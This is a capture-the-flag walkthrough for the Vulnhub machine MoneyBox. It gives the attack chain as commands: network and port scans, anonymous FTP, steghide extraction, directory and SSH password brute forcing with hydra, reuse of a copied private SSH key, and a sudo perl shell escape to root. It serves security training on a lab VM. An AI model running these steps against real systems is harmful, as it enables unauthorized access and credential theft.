MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so. “MoneyBox Walkthrough – Vulnhub – Writeup”.
LInk to the machine: https://www.vulnhub.com/entry/moneybox-1,653/
From this machine, we can learn:
- Basic enumeration of HTTP
- Steganography using steghide
- Basics of SSH
- Abuse sudo to get root privilege escalation
Identify the target
First of all, I identified the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Next, I scanned the open ports to identify the exposed services.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53
Here, we can see that we have anonymous FTP access. So, I logged into FTP.
Anonymous FTP access
lftp -u anonymous, 10.0.2.53
I downloaded the image to my local machine. Then, I tried extracting data using steghide and without a password but it gave me nothing.
steghide extract -sf trytofind.jpg
I also tried bruteforcing the password, it didn’t give me anything.
stegseek trytofind.jpg /home/kali/rockyou.txt
So, I might have to get the password for the steganography.
Enumerate the webserver
The default page doesn’t give anything.
When I brute-forced the directory on the webserver, I found a path.
gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log
Upon curling the path, I found a hint.
curl -L 10.0.2.53/blogs
The path had a comment that suggested I visit a new path.
curl -L 10.0.2.53/S3cr3t-T3xt
Here, we got the secret key that I could use to use in the steganography.
Steganography
Steganography is the way to hide data inside different files. Since we have an image of the extension jpg, we can guess that the image has used steghide for the steganography.
steghide extract -sf trytofind.jpg
It wrote to a new file “data.txt”. The file had a hint for a username on the target.
cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
The file gives us the username as “renu”. Also, the password is weak. Therefore, we might want to bruteforce the password.
Bruteforce
hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh
We were able to crack the password. Hence, I logged in as renu and got the user flag.
ssh [email protected]
ls -al
cat user1.txt
Escalate to different user
When I listed the home directories, I found another user on the machine.
cd /home
ls -al
On the home page of lily, there is an SSH directory.
cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys
The SSH directory has a file authorized_keys that had the public SSH key of the user renu. This means, using the private key of the user, we can log as lily. There are two ways to do so. First, we can copy the private key of renu to our local machine and log into SSH from the local machine.
scp [email protected]:~/.ssh/id_rsa .
The above command will copy the id_rsa and its permissions. This is a better way than serving via an HTTP server. Now, we can log in.
ssh [email protected] -i .ssh/id_rsa
Alternatively, we can also switch to lily from the target machine itself.
cd
ssh lily@localhost -i .ssh/id_rsa
From here, we can get the user flag.
cat user2.txt
Root privilege escalation
From lily, we can check the sudo permissions.
sudo -l
We can see that the user can run perl command as all users. Therefore, we can now execute commands as any user.
References: https://gtfobins.github.io/gtfobins/perl/#sudo
sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt